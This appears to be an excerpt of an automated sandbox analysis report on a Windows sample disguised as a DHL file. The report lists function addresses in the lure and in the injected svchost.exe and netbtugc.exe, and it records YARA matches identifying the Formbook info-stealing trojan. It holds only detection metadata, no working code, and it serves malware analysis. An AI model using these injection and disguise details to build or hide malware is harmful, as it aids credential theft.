Source: C:\Users\user\Desktop\DHL 8350232025-1.exe	Code function: 0_2_001D6DD9	0_2_001D6DD9
Source: C:\Users\user\Desktop\DHL 8350232025-1.exe	Code function: 0_2_001BB119	0_2_001BB119
Source: C:\Users\user\Desktop\DHL 8350232025-1.exe	Code function: 0_2_001A91C0	0_2_001A91C0
Source: C:\Users\user\Desktop\DHL 8350232025-1.exe	Code function: 0_2_001C1394	0_2_001C1394
Source: C:\Users\user\Desktop\DHL 8350232025-1.exe	Code function: 0_2_001C1706	0_2_001C1706
Source: C:\Users\user\Desktop\DHL 8350232025-1.exe	Code function: 0_2_001C781B	0_2_001C781B
Source: C:\Users\user\Desktop\DHL 8350232025-1.exe	Code function: 0_2_001A7920	0_2_001A7920
Source: C:\Users\user\Desktop\DHL 8350232025-1.exe	Code function: 0_2_001B997D	0_2_001B997D
Source: C:\Users\user\Desktop\DHL 8350232025-1.exe	Code function: 0_2_001C19B0	0_2_001C19B0
Source: C:\Users\user\Desktop\DHL 8350232025-1.exe	Code function: 0_2_001C7A4A	0_2_001C7A4A
Source: C:\Users\user\Desktop\DHL 8350232025-1.exe	Code function: 0_2_001C1C77	0_2_001C1C77
Source: C:\Users\user\Desktop\DHL 8350232025-1.exe	Code function: 0_2_001C7CA7	0_2_001C7CA7
Source: C:\Users\user\Desktop\DHL 8350232025-1.exe	Code function: 0_2_0022BE44	0_2_0022BE44
Source: C:\Users\user\Desktop\DHL 8350232025-1.exe	Code function: 0_2_001D9EEE	0_2_001D9EEE
Source: C:\Users\user\Desktop\DHL 8350232025-1.exe	Code function: 0_2_001C1F32	0_2_001C1F32
Source: C:\Users\user\Desktop\DHL 8350232025-1.exe	Code function: 0_2_001ABF40	0_2_001ABF40
Source: C:\Users\user\Desktop\DHL 8350232025-1.exe	Code function: 0_2_01388550	0_2_01388550
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00416871	2_2_00416871
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00416873	2_2_00416873
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_004028A0	2_2_004028A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00410173	2_2_00410173
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00401110	2_2_00401110
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0040E1F3	2_2_0040E1F3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00401290	2_2_00401290
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00403500	2_2_00403500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0040268A	2_2_0040268A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00402698	2_2_00402698
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_004026A0	2_2_004026A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0040FF4A	2_2_0040FF4A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0042D753	2_2_0042D753
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0040FF53	2_2_0040FF53
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C003E6	2_2_03C003E6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B4E3F0	2_2_03B4E3F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BFA352	2_2_03BFA352
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BC02C0	2_2_03BC02C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BE0274	2_2_03BE0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BF41A2	2_2_03BF41A2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C001AA	2_2_03C001AA
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BF81CC	2_2_03BF81CC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BDA118	2_2_03BDA118
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B30100	2_2_03B30100
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BC8158	2_2_03BC8158
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BD2000	2_2_03BD2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B3C7C0	2_2_03B3C7C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B40770	2_2_03B40770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B64750	2_2_03B64750
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B5C6E0	2_2_03B5C6E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C00591	2_2_03C00591
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B40535	2_2_03B40535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BEE4F6	2_2_03BEE4F6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BE4420	2_2_03BE4420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BF2446	2_2_03BF2446
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BF6BD7	2_2_03BF6BD7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BFAB40	2_2_03BFAB40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B3EA80	2_2_03B3EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B429A0	2_2_03B429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C0A9A6	2_2_03C0A9A6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B56962	2_2_03B56962
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B268B8	2_2_03B268B8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B6E8F0	2_2_03B6E8F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B4A840	2_2_03B4A840
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B42840	2_2_03B42840
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BBEFA0	2_2_03BBEFA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B4CFE0	2_2_03B4CFE0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B32FC8	2_2_03B32FC8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B60F30	2_2_03B60F30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BE2F30	2_2_03BE2F30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B82F28	2_2_03B82F28
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BB4F40	2_2_03BB4F40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B52E90	2_2_03B52E90
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BFCE93	2_2_03BFCE93
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BFEEDB	2_2_03BFEEDB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BFEE26	2_2_03BFEE26
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B40E59	2_2_03B40E59
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B58DBF	2_2_03B58DBF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B3ADE0	2_2_03B3ADE0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BDCD1F	2_2_03BDCD1F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B4AD00	2_2_03B4AD00
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BE0CB5	2_2_03BE0CB5
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B30CF2	2_2_03B30CF2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B40C00	2_2_03B40C00
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B8739A	2_2_03B8739A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BF132D	2_2_03BF132D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B2D34C	2_2_03B2D34C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B452A0	2_2_03B452A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BE12ED	2_2_03BE12ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B5B2C0	2_2_03B5B2C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B4B1B0	2_2_03B4B1B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C0B16B	2_2_03C0B16B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B2F172	2_2_03B2F172
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B7516C	2_2_03B7516C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BF70E9	2_2_03BF70E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BFF0E0	2_2_03BFF0E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BEF0CC	2_2_03BEF0CC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B470C0	2_2_03B470C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BFF7B0	2_2_03BFF7B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BF16CC	2_2_03BF16CC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B85630	2_2_03B85630
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C095C3	2_2_03C095C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BDD5B0	2_2_03BDD5B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BF7571	2_2_03BF7571
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BFF43F	2_2_03BFF43F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B31460	2_2_03B31460
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B5FB80	2_2_03B5FB80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BB5BF0	2_2_03BB5BF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B7DBF9	2_2_03B7DBF9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BFFB76	2_2_03BFFB76
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BDDAAC	2_2_03BDDAAC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B85AA0	2_2_03B85AA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BE1AA3	2_2_03BE1AA3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BEDAC6	2_2_03BEDAC6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BB3A6C	2_2_03BB3A6C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BFFA49	2_2_03BFFA49
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BF7A46	2_2_03BF7A46
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BD5910	2_2_03BD5910
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B49950	2_2_03B49950
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B5B950	2_2_03B5B950
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B438E0	2_2_03B438E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BAD800	2_2_03BAD800
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BFFFB1	2_2_03BFFFB1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B41F92	2_2_03B41F92
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BFFF09	2_2_03BFFF09
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B49EB0	2_2_03B49EB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B5FDC0	2_2_03B5FDC0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BF7D73	2_2_03BF7D73
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BF1D5A	2_2_03BF1D5A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B43D40	2_2_03B43D40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BFFCF2	2_2_03BFFCF2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BB9C32	2_2_03BB9C32
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_0315A352	4_2_0315A352
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_031603E6	4_2_031603E6
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_030AE3F0	4_2_030AE3F0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_03140274	4_2_03140274
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_031202C0	4_2_031202C0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_03090100	4_2_03090100
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_0313A118	4_2_0313A118
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_03128158	4_2_03128158
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_031541A2	4_2_031541A2
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_031601AA	4_2_031601AA
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_031581CC	4_2_031581CC
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_03132000	4_2_03132000
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_030C4750	4_2_030C4750
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_030A0770	4_2_030A0770
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_0309C7C0	4_2_0309C7C0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_030BC6E0	4_2_030BC6E0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_030A0535	4_2_030A0535
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_03160591	4_2_03160591
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_03144420	4_2_03144420
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_03152446	4_2_03152446
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_0314E4F6	4_2_0314E4F6
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_0315AB40	4_2_0315AB40
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_03156BD7	4_2_03156BD7
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_0309EA80	4_2_0309EA80
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_030B6962	4_2_030B6962
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_030A29A0	4_2_030A29A0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_0316A9A6	4_2_0316A9A6
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_030A2840	4_2_030A2840
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_030AA840	4_2_030AA840
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_030868B8	4_2_030868B8
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_030CE8F0	4_2_030CE8F0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_03142F30	4_2_03142F30
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_030E2F28	4_2_030E2F28
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_030C0F30	4_2_030C0F30
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_03114F40	4_2_03114F40
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_0311EFA0	4_2_0311EFA0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_03092FC8	4_2_03092FC8
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_030ACFE0	4_2_030ACFE0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_0315EE26	4_2_0315EE26
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_030A0E59	4_2_030A0E59
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_0315CE93	4_2_0315CE93
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_030B2E90	4_2_030B2E90
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_0315EEDB	4_2_0315EEDB
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_030AAD00	4_2_030AAD00
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_0313CD1F	4_2_0313CD1F
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_030B8DBF	4_2_030B8DBF
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_0309ADE0	4_2_0309ADE0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_030A0C00	4_2_030A0C00
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_03140CB5	4_2_03140CB5
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_03090CF2	4_2_03090CF2
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_0315132D	4_2_0315132D
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_0308D34C	4_2_0308D34C
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_030E739A	4_2_030E739A
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_030A52A0	4_2_030A52A0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_030BB2C0	4_2_030BB2C0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_031412ED	4_2_031412ED
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_030D516C	4_2_030D516C
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_0308F172	4_2_0308F172
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_0316B16B	4_2_0316B16B
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_030AB1B0	4_2_030AB1B0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_030A70C0	4_2_030A70C0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_0314F0CC	4_2_0314F0CC
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_0315F0E0	4_2_0315F0E0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_031570E9	4_2_031570E9
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_0315F7B0	4_2_0315F7B0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_030E5630	4_2_030E5630
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_031516CC	4_2_031516CC
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_03157571	4_2_03157571
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_0313D5B0	4_2_0313D5B0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_031695C3	4_2_031695C3
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_0315F43F	4_2_0315F43F
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_03091460	4_2_03091460
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_0315FB76	4_2_0315FB76
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_030BFB80	4_2_030BFB80
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_03115BF0	4_2_03115BF0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_030DDBF9	4_2_030DDBF9
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_03157A46	4_2_03157A46
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_0315FA49	4_2_0315FA49
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_03113A6C	4_2_03113A6C
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_030E5AA0	4_2_030E5AA0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_03141AA3	4_2_03141AA3
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_0313DAAC	4_2_0313DAAC
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_0314DAC6	4_2_0314DAC6
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_03135910	4_2_03135910
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_030A9950	4_2_030A9950
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_030BB950	4_2_030BB950
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_0310D800	4_2_0310D800
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_030A38E0	4_2_030A38E0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_0315FF09	4_2_0315FF09
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_030A1F92	4_2_030A1F92
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_0315FFB1	4_2_0315FFB1
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_03063FD5	4_2_03063FD5
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_03063FD2	4_2_03063FD2
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_030A9EB0	4_2_030A9EB0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_030A3D40	4_2_030A3D40
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_03151D5A	4_2_03151D5A
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_03157D73	4_2_03157D73
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_030BFDC0	4_2_030BFDC0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_03119C32	4_2_03119C32
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_0315FCF2	4_2_0315FCF2
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_025515E0	4_2_025515E0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_0254C7D0	4_2_0254C7D0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_0254C7C7	4_2_0254C7C7
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_0254AA70	4_2_0254AA70
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_0254C9F0	4_2_0254C9F0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_025530F0	4_2_025530F0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_025530EE	4_2_025530EE
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_02569FD0	4_2_02569FD0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_02DAA0AF	4_2_02DAA0AF
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_02DAB8B4	4_2_02DAB8B4
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_02DAB9D6	4_2_02DAB9D6
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_02DAADD8	4_2_02DAADD8
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_02DABD6C	4_2_02DABD6C

Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 03BAEA12 appears 86 times
Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 03B75130 appears 58 times
Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 03BBF290 appears 105 times
Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 03B2B970 appears 280 times
Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 03B87E54 appears 111 times
Source: C:\Users\user\Desktop\DHL 8350232025-1.exe	Code function: String function: 001BF9F2 appears 40 times
Source: C:\Users\user\Desktop\DHL 8350232025-1.exe	Code function: String function: 001A9CB3 appears 31 times
Source: C:\Users\user\Desktop\DHL 8350232025-1.exe	Code function: String function: 001C0A30 appears 46 times
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: String function: 030D5130 appears 58 times
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: String function: 0311F290 appears 105 times
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: String function: 0308B970 appears 280 times
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: String function: 0310EA12 appears 86 times
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: String function: 030E7E54 appears 111 times

Source: DHL 8350232025-1.exe, 00000000.00000003.1449756846.0000000003E13000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs DHL 8350232025-1.exe
Source: DHL 8350232025-1.exe, 00000000.00000003.1448459442.0000000003FBD000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs DHL 8350232025-1.exe

Source: DHL 8350232025-1.exe

Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE

Source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000002.00000002.1603244254.00000000039A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000002.00000002.1602875131.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000004.00000002.3911918141.0000000002A10000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000004.00000002.3911851240.00000000029D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
